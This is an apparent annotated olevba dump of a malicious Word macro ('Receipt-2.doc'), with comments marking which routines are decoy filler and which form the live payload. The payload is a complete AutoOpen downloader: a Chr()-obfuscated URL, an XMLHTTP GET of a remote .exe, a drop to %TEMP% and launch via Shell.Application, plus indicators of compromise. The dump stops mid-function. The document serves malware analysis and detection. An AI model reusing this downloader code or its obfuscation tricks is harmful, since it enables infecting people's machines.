dynamoo

Malicious Word macro (Receipt-2.doc, olevba 0.41 dump): an AutoOpen downloader that fetches a remote .exe over HTTP, drops it as %TEMP%\fDe12.exe and launches it via Shell.Application; everything else in the VBA project is decoy code.

Oct 8th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V Receipt-2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Receipt-2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Auto-executing entry point. Word runs autoopen() as soon as the document is
  ' opened with macros enabled (olevba: "AutoExec / AutoOpen"). Its only job is to
  ' call JPEHuffmTable (Module2), which downloads and launches an executable.
  ' Sample preserved verbatim as evidence -- never run outside an isolated
  ' analysis VM with no network access.
  15. Sub autoopen()
  16. JPEHuffmTable   ' -> Module2.JPEHuffmTable: the actual downloader/launcher
  17. End Sub
  18. -------------------------------------------------------------------------------
  19. VBA MACRO Module1.bas
  20. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/Module1'
  21. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  22.  
  23.  
  ' DECOY / FILLER. Appears lifted from an old BASIC JPEG encoder: READ and Pow2()
  ' are not defined anywhere in the dumped project. Nothing on the live path
  ' (autoopen -> JPEHuffmTable -> COLUMNEWORDER / pDrawComboBox -> pDetach /
  ' JPEGPrecalc) calls it; it exists to bury ~30 lines of real payload in
  ' plausible-looking code. Preserved unchanged as evidence.
  24. Sub JPEGGenerateHuffmanTable(Huff() As Integer, a As Integer, b As Integer)
  25. Dim S As Long, i As Integer, J As Integer, T As Integer
  26. Dim X As Integer, Y As Integer
  27. S = -1
  28.  
  29. For i = 1 To 16
  30. READ X
  31. For J = 1 To X
  32.  
  33. If S = -1 Then
  34. S = 0
  35. Else
  36. S = S + Pow2(T)
  37. End If
  38.  
  39.  
  40. READ Y
  41. If S And 32768 Then Huff(Y, a, b, 0) = CInt(S And 32767&) Or -32768 Else Huff(Y, a, b, 0) = S
  42. Huff(Y, a, b, 1) = i
  43. T = 16 - i
  44.  
  45. Next
  46. Next
  47. End Sub
  48.  
  ' LIVE PAYLOAD STEP, disguised as JPEG pre-computation.
  ' Called from COLUMNEWORDER with the Microsoft.XMLHTTP object (already opened
  ' with GET by pDetach). The loop below doubles L sixteen times (L = 65536), so
  ' "If L >= 1" is always true and control jumps straight to HHNf:, where the
  ' ONLY executed statement is FSSik.Send -- the synchronous HTTP request.
  ' The cosine table is skipped and the zig-zag walk after "Exit Sub" is
  ' unreachable; both reference an undefined object C.
  ' Net effect: JPEGPrecalc(obj) == obj.Send
  49. Sub JPEGPrecalc(FSSik As Object)
  50. Dim X As Integer, Y As Integer, T As Integer, Dir As Integer, L As Long
  51.  
  52. L = 1
  53. For X = 0 To 15
  54. 'Pow2(X) = L
  55. L = L + L   ' L ends at 65536 -- the guard below can never be false
  56. Next
  57. If L >= 1 Then
  58. GoTo HHNf   ' always taken: opaque predicate to hide the straight-line flow
  59. End If
  60. For Y = 0 To 7
  61. For X = 0 To 7
  62. C.Cosine(X, Y) = Cos((2 * X + 1) * Y * 0.1963495)
  63. Next X, Y
  64. HHNf:
  65. FSSik.Send   ' <- XMLHTTP.Send: performs the GET of the remote executable
  66. Exit Sub
  67. X = 0: Y = 0   ' everything from here down is dead code
  68. T = 0
  69. Dir = 0
  70. Do
  71. C.ZigZagX(T) = X
  72. C.ZigZagY(T) = Y
  73. T = T + 1
  74. If T = 64 Then Exit Do
  75. If Dir Then
  76. If Y = 7 Then
  77. X = X + 1
  78. Dir = 0
  79. ElseIf X = 0 Then
  80. Y = Y + 1
  81. Dir = 0
  82. Else
  83. X = X - 1
  84. Y = Y + 1
  85. End If
  86.  
  87. Else
  88. If Y = 0 Then
  89. X = X + 1
  90. Dir = 1
  91. ElseIf X = 7 Then
  92. Y = Y + 1
  93. Dir = 1
  94. Else
  95. X = X + 1
  96. Y = Y - 1
  97. End If
  98. End If
  99. Loop
  100.  
  101.  
  102.  
  103. End Sub
  104.  
  ' DECOY / FILLER. Appears lifted from a VB6 button-skinning library (RECTW,
  ' GetProp/SetProp, AlphaBlend, BS_* constants -- none declared in this
  ' project). Not called from the autoopen chain. Preserved unchanged.
  105. Private Function pDrawButton(ByVal hWnd As Long, ByVal hDC As Long) As Long
  106.     Dim m_Style As Long
  107.     Dim m_State As Long
  108.     Dim m_OldSt As Long
  109.     Dim m_SrcDC As Long
  110.     Dim m_DstDC As Long
  111.     Dim m_Level As Long
  112.     Dim m_wRect As RECTW
  113.     If IsWindowEnabled(hWnd) = 0 Then Call SetProp(hWnd, "OLDSTATE", 3)
  114.     m_Style = GetProp(hWnd, "OLDSTYLE")
  115.     If (m_Style And BS_CHECKBOX) Or (m_Style And BS_RADIOBUTTON) Then Exit Function
  116.     Call pGetWindowRectW(hWnd, m_wRect)
  117.     m_OldSt = GetProp(hWnd, "OLDSTATE")
  118.     m_Level = GetProp(hWnd, "ALPHALEVEL")
  119.     m_SrcDC = GetProp(hWnd, "HDC" & CStr(m_OldSt))
  120.     m_DstDC = IIf(hDC = 0, GetWindowDC(hWnd), hDC)
  121.     AlphaBlend m_DstDC, 0, 0, m_wRect.Width, m_wRect.Height, m_SrcDC, 0, 0, m_wRect.Width, m_wRect.Height, m_Level * &H10000
  122.     If hDC = 0 Then Call ReleaseDC(hWnd, m_DstDC)
  123. End Function
  124.  
  ' LIVE PAYLOAD: HTTP downloader.
  '   SIBBBD  - URL string (supplied by pDrawComboBox, see Module3)
  '   returns - raw bytes of the HTTP response body (the downloaded .exe)
  ' Flow: create Microsoft.XMLHTTP -> pDetach(obj, url, 0) opens "GET" url
  ' synchronously (Module3, hWnd = 0 branch) -> JPEGPrecalc(obj) calls .Send ->
  ' return .responseBody. The GoTo to the very next line is a no-op inserted
  ' as obfuscation. No error handling: a failed request will raise at runtime
  ' in the caller (not confirmed here).
  ' Detection note: WINWORD.EXE issuing an outbound HTTP GET via MSXML is the
  ' observable for this step.
  125. Public Function COLUMNEWORDER(SIBBBD As String) As Byte()
  126. Dim COLUMNBEFOREORDER As Object
  127.  Set COLUMNBEFOREORDER = CreateObject("Microsoft.XMLHTTP")   ' HTTP client
  128.  
  129.  
  130. pDetach COLUMNBEFOREORDER, SIBBBD, 0   ' -> .Open "GET", SIBBBD, False (Module3.pDetach, hWnd = 0)
  131. JPEGPrecalc COLUMNBEFOREORDER          ' -> .Send (Module1.JPEGPrecalc)
  132. GoTo HHGGHHEHD   ' jumps to the next line: pure obfuscation
  133. HHGGHHEHD:
  134. COLUMNEWORDER = COLUMNBEFOREORDER.responseBody   ' downloaded file as Byte()
  135. Exit Function
  136. End Function
  137.  
  ' DECOY / FILLER. Appears lifted from a VB6 Winsock game/client (frmMain.Socket,
  ' PlayerBuffer, HandleData, HandleError, App.LogMode -- none defined here).
  ' Not called from the autoopen chain. Preserved unchanged.
  138. Public Sub IncomingData(ByVal DataLength As Long)
  139. Dim Buffer() As Byte
  140. Dim pLength As Long
  141.  
  142.     If Not App.LogMode = 0 Then On Error GoTo errHandler
  143.  
  144.     frmMain.Socket.GetData Buffer, vbUnicode, DataLength
  145.    
  146.     PlayerBuffer.WriteBytes Buffer()
  147.    
  148.     If PlayerBuffer.Length >= 4 Then pLength = PlayerBuffer.ReadLong(False)
  149.     Do While pLength > 0 And pLength <= PlayerBuffer.Length - 4
  150.         If pLength <= PlayerBuffer.Length - 4 Then
  151.             PlayerBuffer.ReadLong
  152.             HandleData PlayerBuffer.ReadBytes(pLength)
  153.         End If
  154.  
  155.         pLength = 0
  156.         If PlayerBuffer.Length >= 4 Then pLength = PlayerBuffer.ReadLong(False)
  157.     Loop
  158.     PlayerBuffer.Trim
  159.     DoEvents
  160.    
  161.     Exit Sub
  162. errHandler:
  163.     HandleError "IncomingData", "modHandleData", Err.Number, Err.Description
  164.     Err.Clear
  165.     Exit Sub
  166. End Sub
  167.  
  ' DECOY / FILLER. Same VB6 control-skinning library as pDrawButton/pAttach
  ' (GDI blits, GetSystemMetrics, BM_GETCHECK). Not called from the autoopen
  ' chain. Preserved unchanged.
  168. Private Function pDrawCheckBox(ByVal hWnd As Long, ByVal State As Long, Optional ByVal Redraw As Boolean = False) As Long
  169.     Dim mOldState As Long
  170.     mOldState = GetProp(hWnd, "OLDSTATE")
  171.     If mOldState = State And Redraw = False Then Exit Function
  172.     Call SetProp(hWnd, "OLDSTATE", State)
  173.     Dim m_hDC       As Long
  174.     Dim TmpDC       As Long
  175.     Dim m_wRect     As RECTW
  176.     Dim m_cX        As Long
  177.     Dim m_cY        As Long
  178.     Dim mValue      As Long
  179.     m_cX = GetSystemMetrics(SM_CXCHECKBOX)
  180.     m_cY = GetSystemMetrics(SM_CYCHECKBOX)
  181.     Call pGetWindowRectW(hWnd, m_wRect)
  182.     mValue = SendMessage(hWnd, BM_GETCHECK, 0&, 0&)
  183.     TmpDC = pCreateDC(m_cX, m_cY)
  184.     m_hDC = GetWindowDC(hWnd)
  185.     Call pFillRectL(TmpDC, 0, 0, m_cX, m_cY, &HFFFFFF)
  186.     If IsWindowEnabled(hWnd) Then
  187.         If State = 2 Then
  188.             Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HC48639)
  189.         Else
  190.             Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HD5A554)
  191.         End If
  192.         If State = 1 Then Call StretchBlt(TmpDC, 1, 1, m_cX - 2, m_cY - 2, m_hOpbSrcDC, 1, 17, 11, 5, vbSrcCopy)
  193.         If State = 2 Then Call StretchBlt(TmpDC, 1, 1, m_cX - 2, m_cY - 2, m_hOpbSrcDC, 1, 30, 11, 5, vbSrcCopy)
  194.         If mValue = 1 Then Call TransBlt(TmpDC, (m_cX - 9) / 2, (m_cY - 8) / 2, 9, 8, m_hCkbSrcDC, 0, 0)
  195.         If mValue = 2 Then Call TransBlt(TmpDC, (m_cX - 7) / 2, (m_cY - 7) / 2, 7, 7, m_hCkbSrcDC, 1, 9)
  196.     Else
  197.         Call pFrameRect(TmpDC, 0, 0, m_cX, m_cY, &HE9CFA4)
  198.         If mValue = 1 Then Call TransBlt(TmpDC, (m_cX - 9) / 2, (m_cY - 8) / 2, 9, 8, m_hCkbSrcDC, 9, 0)
  199.         If mValue = 2 Then Call TransBlt(TmpDC, (m_cX - 7) / 2, (m_cY - 7) / 2, 7, 7, m_hCkbSrcDC, 10, 9)
  200.     End If
  201.     BitBlt m_hDC, 0, (m_wRect.Height - m_cY) / 2, m_cX, m_cY, TmpDC, 0, 0, vbSrcCopy
  202.     Call ReleaseDC(hWnd, m_hDC)
  203.     DeleteDC TmpDC
  204.     pDrawCheckBox = 1
  205. End Function
  206.  
  ' DECOY / FILLER from the BASIC JPEG encoder. DEF SEG / VARSEG / PEEK are
  ' QBasic, not VBA, and "State" is declared Integer yet used as a record, so
  ' this text is not valid VBA. Not called from the autoopen chain.
  ' NOTE(review): how the project tolerates this in the same module as the live
  ' code (compile-on-demand?) is not determinable from the dump -- confirm in a VM.
  207. Sub JPEGPutBinString(BS As Integer, Length As Integer, State As Integer)
  208. Dim Temp As Integer
  209.  
  210. Temp = BS
  211. State.Leftover = State.Leftover Or JPEG.Shift(Temp, State.LeftoverBits)
  212. State.LeftoverBits = State.LeftoverBits + Length
  213. If State.LeftoverBits >= 16 Then
  214. DEF SEG = VARSEG(State.Leftover)
  215. JPEG.PutByte State.FileNo, PEEK(VarPtr(State.Leftover) + 1)
  216. DEF SEG
  217. JPEG.PutByte State.FileNo, State.Leftover And 255
  218. State.LeftoverBits = State.LeftoverBits - 16
  219. State.Leftover = Temp
  220. End If
  221.  
  222. End Sub
  223.  
  ' DECOY / FILLER. Writes one byte with the native "Put" statement. This (and
  ' JPEGPutWord/PutChar) is what triggers olevba's "Suspicious: Put" hit -- a
  ' false lead; the real file write is ADODB.Stream.SaveToFile in JPEHuffmTable.
  ' Not called from the autoopen chain.
  224. Sub JPEGPutByte(FileNo As Integer, Bytep As Integer)
  225. Dim C As String * 1
  226. C = Chr(Bytep)
  227. Put FileNo, , C
  228. End Sub
  229.  
  ' DECOY / FILLER from the BASIC JPEG encoder (Pow2 and JPEG.PutBinString are
  ' undefined here). Not called from the autoopen chain. Preserved unchanged.
  230. Sub JPEGPutRightBinString(BS As Integer, Length As Integer, State As Integer)
  231.  
  232. Dim Temp As Long
  233. If Length Then
  234. Temp = (CLng(BS) And Pow2(Length) - 1) * Pow2(16 - Length)
  235. If Temp And 32768 Then Temp = Temp Or -65536
  236. JPEG.PutBinString CInt(Temp), Length, State
  237. End If
  238.  
  239. End Sub
  240.  
  ' DECOY / FILLER. Big-endian 16-bit write via "Put" (another source of the
  ' olevba "Put" hit). Not called from the autoopen chain.
  241. Sub JPEGPutWord(FileNo As Integer, Word As Integer)
  242. Dim C As String * 1
  243. C = Chr$(Word \ 256)
  244. Put FileNo, , C
  245. C = Chr$(Word And 255)
  246. Put FileNo, , C
  247. End Sub
  248.  
  ' DECOY / FILLER from the BASIC JPEG encoder. Assigns to "JPEG.Shift" (an
  ' undefined object) instead of its own name, so it cannot even return a value
  ' as written. Not called from the autoopen chain. Preserved unchanged.
  249. Function JPEGShift(i As Integer, N As Integer)
  250. Dim T As Long
  251.  
  252. If N = 0 Then
  253. JPEG.Shift = i
  254. i = 0
  255. Exit Function
  256. End If
  257. T = CLng(i) And 65535
  258.  
  259. JPEG.Shift = T \ Pow2(N)
  260.  
  261. T = (T And (Pow2(N) - 1)) * Pow2((16 - N) And 15)
  262. If T And 32768 Then i = CInt(T And 32767&) Or -32768 Else i = CInt(T)
  263. End Function
  264.  
  ' DECOY / FILLER from the BASIC JPEG encoder (Restore/READ DATA statements do
  ' not exist in VBA). Not called from the autoopen chain. Preserved unchanged.
  265. Sub JPEGStandardQT(quality As Single, QT() As Integer)
  266.  
  267. Dim i As Integer, X As Integer, Y As Integer, T As Integer
  268. Restore StandardQT
  269.  
  270. For i = 0 To 1: For Y = 0 To 7: For X = 0 To 7
  271. READ T
  272.  
  273. QT(X, Y, i) = T * quality
  274.  
  275. If QT(X, Y, i) = 0 Then QT(X, Y, i) = 1
  276. Next X, Y, i
  277.  
  278. End Sub
  279.  
  ' DECOY / FILLER. RGB-to-luma formula from the JPEG encoder; assigns to the
  ' undefined "JPEG.Y". Not called from the autoopen chain.
  280. Public Function JPEGY(R As Integer, G As Integer, b As Integer)
  281.  
  282. JPEG.Y = 0.299 * R + 0.587 * G + 0.114 * b - 128
  283.  
  284. End Function
  285.  
  ' DECOY / FILLER. Duplicate of JPEGPutByte; contributes to the olevba "Put"
  ' hit but is never called from the autoopen chain.
  286. Sub PutChar(FileNo As Integer, Char As Integer)
  287. Dim C As String * 1
  288. C = Chr$(Char)
  289. Put FileNo, , C
  290. End Sub
  291. -------------------------------------------------------------------------------
  292. VBA MACRO Module2.bas
  293. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/Module2'
  294. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  295.  
  ' DECOY / FILLER. Overflow-free 32-bit add copied from a VB MD5 implementation
  ' (MD5LongConversion is undefined here). Shares Module2 with the payload only to
  ' make the module look like a legitimate hashing library. Not called from the
  ' autoopen chain. Preserved unchanged.
  296. Private Function MD5LongAdd(lngVal1 As Long, lngVal2 As Long) As Long
  297.    
  298.     Dim lngHighWord As Long
  299.     Dim lngLowWord As Long
  300.     Dim lngOverflow As Long
  301.  
  302.     lngLowWord = (lngVal1 And &HFFFF&) + (lngVal2 And &HFFFF&)
  303.     lngOverflow = lngLowWord \ 65536
  304.     lngHighWord = (((lngVal1 And &HFFFF0000) \ 65536) + ((lngVal2 And &HFFFF0000) \ 65536) + lngOverflow) And &HFFFF&
  305.    
  306.     MD5LongAdd = MD5LongConversion((lngHighWord * 65536#) + (lngLowWord And &HFFFF&))
  307.  
  308. End Function
  ' LIVE PAYLOAD: download-and-execute, called from ThisDocument.autoopen.
  '   1. Create an ADODB.Stream for binary output.
  '   2. Read %TEMP% of the Word process via WScript.Shell ("T"+Chr(69)+"MP" = "TEMP").
  '   3. Target path = %TEMP%\fDe12.exe ("\f"+Chr(68)+"e12.ex"+Chr(101)).
  '   4. pDrawComboBox(0,0,0) returns the Chr()-assembled URL
  '      hxxp://archives.wnpvam[.]com/bvcb34d/983bv3.exe (defanged; see Module3);
  '      COLUMNEWORDER GETs it and returns the bytes, which are written to the stream.
  '   5. SaveToFile writes the dropped executable (mode 2 = overwrite).
  '   6. Shell.Application.Open launches it.
  ' No Option Explicit: processEnv, COLUMTRADETATUS, iChkBaseOrd1erGo and
  ' MEIGARWORKSHEEAME are undeclared Variants.
  ' IOCs / detection: outbound GET to the host above from WINWORD.EXE;
  ' file create of %TEMP%\fDe12.exe by WINWORD.EXE; WINWORD.EXE as parent of a
  ' process started from %TEMP%. Preserved verbatim as evidence.
  309. Public Sub JPEHuffmTable()
  310. Dim COLUMNTRADEZ: Set COLUMNTRADEZ = CreateObject("Adodb.Stream")   ' binary file writer
  311.  
  312. Set processEnv = CreateObject("WScript.Shell").Environment("Process")
  313. COLUMTRADETATUS = processEnv("T" + Chr(69) + "MP")   ' "TEMP" -> %TEMP% directory
  314. iChkBaseOrd1erGo = COLUMTRADETATUS + "\f" + Chr(68) + "e12.ex" & Chr(101)   ' %TEMP%\fDe12.exe
  315. With COLUMNTRADEZ
  316.    .Type = 1   ' ADODB adTypeBinary
  317.     .Open
  318.     .write COLUMNEWORDER(pDrawComboBox(0, 0, 0))   ' download URL -> response bytes -> stream
  319.     .savetofile iChkBaseOrd1erGo, 2   ' 2 = adSaveCreateOverWrite: drop the .exe
  320. End With
  321. Set MEIGARWORKSHEEAME = CreateObject("Shell.Application")
  322. MEIGARWORKSHEEAME.Open iChkBaseOrd1erGo   ' execute the dropped %TEMP%\fDe12.exe
  323. End Sub
  324.  
  ' DECOY / FILLER. Four-operand variant of MD5LongAdd from the same VB MD5
  ' source (MD5LongConversion undefined here). Not called from the autoopen
  ' chain. Preserved unchanged.
  325. Private Function MD5LongAdd4(lngVal1 As Long, lngVal2 As Long, lngVal3 As Long, lngVal4 As Long) As Long
  326.    
  327.     Dim lngHighWord As Long
  328.     Dim lngLowWord As Long
  329.     Dim lngOverflow As Long
  330.  
  331.     lngLowWord = (lngVal1 And &HFFFF&) + (lngVal2 And &HFFFF&) + (lngVal3 And &HFFFF&) + (lngVal4 And &HFFFF&)
  332.     lngOverflow = lngLowWord \ 65536
  333.     lngHighWord = (((lngVal1 And &HFFFF0000) \ 65536) + ((lngVal2 And &HFFFF0000) \ 65536) + ((lngVal3 And &HFFFF0000) \ 65536) + ((lngVal4 And &HFFFF0000) \ 65536) + lngOverflow) And &HFFFF&
  334.     MD5LongAdd4 = MD5LongConversion((lngHighWord * 65536#) + (lngLowWord And &HFFFF&))
  335.  
  336. End Function
  337. -------------------------------------------------------------------------------
  338. VBA MACRO Module3.bas
  339. in file: Receipt-2.doc - OLE stream: u'Macros/VBA/Module3'
  340. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  341.  
  342.  
  ' DECOY / FILLER. Window-subclassing routine from a VB6 control-skinning
  ' library (SetWindowLong GWL_WNDPROC + AddressOf WindowProc, GetProp/SetProp,
  ' CreateRoundRectRgn). The API hooking looks alarming but none of the
  ' referenced declarations exist in this project and nothing on the autoopen
  ' chain calls pAttach. The "'????..." comment is a non-ASCII original lost in
  ' extraction. Preserved unchanged.
  343. Private Function pAttach(ByVal hWnd As Long) As Long
  344. If hWnd = 0 Then Exit Function
  345.     If GetProp(hWnd, "PROCADDR") Then Exit Function
  346.     Dim sClassName  As String
  347.     sClassName = LCase(pGetClassName(hWnd))
  348.     Select Case sClassName
  349.         '=====================================================================================
  350.        Case "#32770", "thunderformdc", "thunderrt6formdc", "form"
  351.             Call EnumChildWindows(hWnd, AddressOf pEnumChildProc, ByVal 0&)
  352.            
  353.         '=====================================================================================
  354.        Case "thundercommandbutton", "thunderrt6commandbutton", "button"
  355.             Dim i           As Long
  356.             Dim m_hDC       As Long
  357.             Dim m_mDC(3)    As Long
  358.             Dim m_BMP(3)    As Long
  359.             Dim m_wRect     As RECTW
  360.             Dim m_dwStyle   As Long
  361.             m_hDC = GetWindowDC(hWnd)
  362.             pGetWindowRectW hWnd, m_wRect
  363.             For i = 0 To 3
  364.                 m_mDC(i) = CreateCompatibleDC(m_hDC)
  365.                 m_BMP(i) = CreateCompatibleBitmap(m_hDC, m_wRect.Width, m_wRect.Height)
  366.                 DeleteObject SelectObject(m_mDC(i), m_BMP(i))
  367.                 SetProp hWnd, "HDC" & CStr(i), m_mDC(i)
  368.                 SetProp hWnd, "BMP" & CStr(i), m_BMP(i)
  369.             Next
  370.             Call pDrawMemDC(hWnd)
  371.             ReleaseDC hWnd, m_hDC
  372.             m_dwStyle = GetWindowLong(hWnd, GWL_STYLE)
  373.             If (m_dwStyle And BS_CHECKBOX) Or (m_dwStyle And BS_RADIOBUTTON) Then
  374.             Else
  375.                 SendMessage hWnd, BM_SETSTYLE, BS_OWNERDRAW, ByVal True
  376.             End If
  377.             SetProp hWnd, "OLDSTYLE", m_dwStyle         '????????,?????????????????
  378.            SetProp hWnd, "MOUSEFLAG", 0
  379.             SetProp hWnd, "TIMERID", 0
  380.             SetProp hWnd, "OLDSTATE", IIf(IsWindowEnabled(hWnd), 0, 3)
  381.             SetProp hWnd, "ALPHALEVEL", 0
  382.             SetWindowRgn hWnd, CreateRoundRectRgn(0, 0, m_wRect.Width + 1, m_wRect.Height + 1, 3, 3), True
  383.            
  384.         '=====================================================================================
  385.        Case "thundercombobox", "thunderrt6combobox", "combo", "combobox", "thunderdrivelistbox", "thunderrt6drivelistbox", _
  386.              "thundercheckbox", "thunderrt6checkbox", "thunderoptionbutton", "thunderrt6optionbutton"
  387.             SetProp hWnd, "MOUSEFLAG", 0
  388.             SetProp hWnd, "OLDSTATE", 0
  389.        
  390.         '=====================================================================================
  391.        Case "progressbar20wndclass", "progressbarwndclass"
  392.             'Call pGetWindowRectW(hWnd, m_wRect)
  393.            'SetWindowRgn hWnd, CreateRoundRectRgn(0, 0, m_wRect.Width + 1, m_wRect.Height + 1, 3, 3), False
  394.        
  395.         '=====================================================================================
  396.        Case "msvb_lib_header", "sysheader32"
  397.             SetProp hWnd, "MOUSEFLAG", 0
  398.             SetProp hWnd, "HDINDEX", -1
  399.             SetProp hWnd, "HMINDEX", -1
  400.            
  401.         '=====================================================================================
  402.        Case Else
  403.    
  404.     End Select
  405.     m_SubclassCount = m_SubclassCount + 1
  406.     SetProp hWnd, "PROCADDR", SetWindowLong(hWnd, GWL_WNDPROC, AddressOf WindowProc)
  407.     SendMessage hWnd, WM_NCPAINT, 1&, 0&
  408.     RedrawWindow hWnd, ByVal 0&, ByVal 0&, &H1 Or &H2
  409.     pAttach = 1
  410. End Function
  411.  
  ' LIVE PAYLOAD STEP hidden inside a repurposed "detach subclass" routine.
  '   PROCADDRR2  - the Microsoft.XMLHTTP object from COLUMNEWORDER
  '   pGetClsName - the download URL
  '   hWnd        - always 0 from the only caller
  ' With hWnd = 0 the first line jumps to label PROCADDR:, whose single live
  ' statement is  PROCADDRR2.Open "GET", url, False  -- a synchronous HTTP GET
  ' ("G"+Chr(69)+"T" = "GET") -- followed by Exit Function.
  ' Everything between the GoTo and the label, and everything after Exit
  ' Function, is unreachable for hWnd = 0: it references an undefined object
  ' "vd." and contains deliberately mangled identifiers (Dvd.eleteDC,
  ' Devd.leteDC, Delvd.eteDC) that would never parse. Preserved verbatim.
  412. Public Function pDetach(PROCADDRR2 As Object, pGetClsName As String, hWnd As Long)
  413. If hWnd = 0 Then GoTo PROCADDR   ' always true from COLUMNEWORDER -> skip to the .Open
  414.     Dim OrigProc As Long
  415.     OrigProc = vd.GetProp(hWnd, "PROCADDR")
  416.     If OrigProc = 0 Then Exit Function
  417.     Dim sClassName  As String
  418.     sClassName = LCase(vd.pGetClassName(hWnd))
  419.     Select Case sClassName
  420.         '=====================================================================================
  421.        Case "#32770", "thunderformdc", "thunderrt6formdc", "form"
  422.            
  423.         '=====================================================================================
  424.        Case "thundercommandbutton", "thunderrt6commandbutton", "button"
  425.             Dim m_mDC(3)    As Long
  426.             Dim m_BMP(3)    As Long
  427.             Dim i As Long
  428.             For i = 0 To 3
  429.                 m_mDC(i) = vd.GetProp(hWnd, "HDC" & CStr(i))
  430.                 m_BMP(i) = vd.GetProp(hWnd, "BMP" & CStr(i))
  431.                vd.DeleteObject m_mDC(i)
  432.                 vd.DeleteDC m_BMP(i)
  433.                 vd.RemoveProp hWnd, "HDC" & CStr(i)
  434.                 vd.RemoveProp hWnd, "BMP" & CStr(i)
  435.             Next
  436.             vd.Call vd.pKillTimer(hWnd)
  437.             vd.SetWindowLong hWnd, -16, vd.GetProp(hWnd, "OLDSTYLE")
  438.             vd.RemoveProp hWnd, "OLDSTYLE"
  439.             vd.RemoveProp hWnd, "MOUSEFLAG"
  440.             vd.RemoveProp hWnd, "TIMERID"
  441.             vd.RemoveProp hWnd, "OLDSTATE"
  442.             vd.RemoveProp hWnd, "ALPHALEVEL"
  443.             vd.SetWindowRgn hWnd, 0&, True
  444.         '=====================================================================================
  445.        Case "thundercombobox", "thunderrt6combobox", "combo", "combobox", "thunderdrivelistbox", "thunderrt6drivelistbox", _
  446.              "thundercheckbox", "thunderrt6checkbox", "thunderoptionbutton", "thunderrt6optionbutton"
  447.             vd.RemoveProp hWnd, "MOUSEFLAG"
  448.             vd.RemoveProp hWnd, "OLDSTATE"
  449.        
  450.         Case "msvb_lib_header", "sysheader32"
  451.             vd.RemoveProp hWnd, "MOUSEFLAG"
  452.             vd.RemoveProp hWnd, "HDINDEX"
  453.             vd.RemoveProp hWnd, "HMINDEX"
  454.            
  455.         '=====================================================================================
  456.        Case "progressbar20wndclass", "progressbarwndclass"
  457.             'SetWindowRgn hWnd, 0&, ByVal True
  458.                    
  459.         '=====================================================================================
  460.        Case "datalistwndclass", "dblistwndclass"
  461.                                
  462.         '=====================================================================================
  463.        Case Else
  464.    
  465.     End Select
  466.    
  467.    
  468.    
  469. PROCADDR:
  470. PROCADDRR2.Open "G" + Chr(69) + "T", pGetClsName, False   ' XMLHTTP.Open "GET", <url>, synchronous
  471. Exit Function   ' nothing below this line ever runs
  472.     vd.RemoveProp hWnd, "PROCADDR"
  473.    ' Call SetWindowLong(hWnd, GWL_WNDPROC, OrigProc)
  474.    vd.SendMessage hWnd, WM_NCPAINT, 1&, 0&
  475.     vd.RedrawWindow hWnd, 0&, 0&, &H1 Or &H2
  476.     m_SubclassCount = m_SubclassCount - 1
  477.     If m_SubclassCount <= 0 Then
  478.         m_SubclassCount = 0
  479.         vd.DeleteDC m_hBtnSrcDC
  480.         Dvd.eleteDC m_hCbbSrcDC
  481.         Devd.leteDC m_hCkbSrcDC
  482.         Devd.leteDC m_hOpbSrcDC
  483.         Delvd.eteDC m_hHdbSrcDC
  484.         m_Init = False
  485.     End If
  486.     pDetach = 1
  487. End Function
  488.  
  ' LIVE PAYLOAD STEP: returns the download URL.
  ' Parameters are ignored (called as pDrawComboBox(0, 0, 0) from JPEHuffmTable).
  ' The return value is assembled from Chr() calls to defeat string scanning;
  ' decoded (and defanged here) it is
  '     hxxp://archives.wnpvam[.]com/bvcb34d/983bv3.exe
  ' which matches the IOC olevba recovered in the summary table. "Exit Function"
  ' follows immediately; every line after it is dead code with deliberately
  ' broken identifiers (Se.ndMessage, Ge.tProp, Cal.L ...) that cannot parse.
  ' Preserved verbatim as evidence.
  489. Public Function pDrawComboBox(hWnd As Long, hDC As Long, yyyy As Long) As String
  490.     Dim mOldState As Long
  491.     Dim bDrop     As Long
  ' next line decodes to the C2/download URL (see header comment)
  492.     pDrawComboBox = Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(97) & Chr(114) & "c" & "h" & Chr(105) & "v" & Chr(101) & Chr(115) & "." & Chr(119) & Chr(110) & "p" & Chr(118) & Chr(97) & Chr(109) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "b" & Chr(118) & Chr(99) & Chr(98) & Chr(51) & "4" & Chr(100) & Chr(47) & Chr(57) & "8" & Chr(51) & Chr(98) & "v" & Chr(51) & Chr(46) & Chr(101) & Chr(120) & "e"
  493. Exit Function   ' everything below is unreachable
  494.     bDrop = Se.ndMessage(hWnd, CB_GETDROPPEDSTATE, 0&, 0&)
  495.     mOldState = Ge.tProp(hWnd, "OLDSTATE")
  496.     If bDrop Then State = 2
  497.     If mOldState = State And Redraw = False Then Exit Function
  498.     If Not GetWin.dowLong(hWnd, GWL_STYLE) And &H2 Then Exit Function
  499.     Ca.ll SetP.rop(hWnd, "OLDSTATE", State)
  500.     Dim m_BtSize    As Long
  501.     Dim m_hDC       As Long
  502.     Dim TmpDC       As Long
  503.     Dim TmpBMP      As Long
  504.     Cal.L pGetWind.owRectW(hWnd, m_wRect)
  505.     m_BtSize = GetS.ystemMetrics(SM_CXVSCROLL) + 1
  506.     TmpDC = pCre.ateDC(m_BtSize, m_wRect.Height - 2)
  507.     Select Case State
  508.             Case 0
  509.                 C.all pFil.lRectL(TmpDC, 0, 0, m_BtSize, m_wRect.Height - 2, &HFFFFFF)
  510.  
